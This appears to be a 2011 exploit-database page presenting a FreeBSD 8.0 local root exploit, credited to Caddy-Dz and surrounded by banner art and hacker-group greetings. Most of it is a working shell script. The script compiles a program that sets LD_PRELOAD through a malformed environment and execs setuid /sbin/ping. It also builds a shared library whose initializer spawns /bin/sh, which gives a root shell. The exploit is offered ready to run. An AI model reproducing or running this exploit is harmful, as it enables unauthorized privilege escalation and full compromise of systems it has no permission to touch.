FreeBSD 8.0 Local Root Exploit



EKU-ID: 1131 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-10-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#=====================================================================
#                      .__         .__  __            .__    .___
#  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
#_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
#\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 
# \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
#     \/      \/|__|                                          \/  
#			Exploit-ID is the Exploit Information Disclosure
# 
#Web             : exploit-id.com	
#e-mail          : root[at]exploit-id[dot]com             
# 
#            #########################################			  
#		  	   I'm Caddy-Dz, member of Exploit-Id				
#		  	 #########################################			  
#======================================================================

####
# Exploit Title: FreeBSD 8.0 Local Root Exploit
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Category:: Local Exploits
# Tested on: 8.0-RELEASE
####

# Exploit

#!/bin/sh
echo ** FreeBSD local r00t Exploit
echo by Caddy-Dz
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env


# Peace From Algeria ...

#=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
#  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , yacine hebbal |
#  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
#  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
#  RmZ ...others                                                                              |
#============================================================================================ |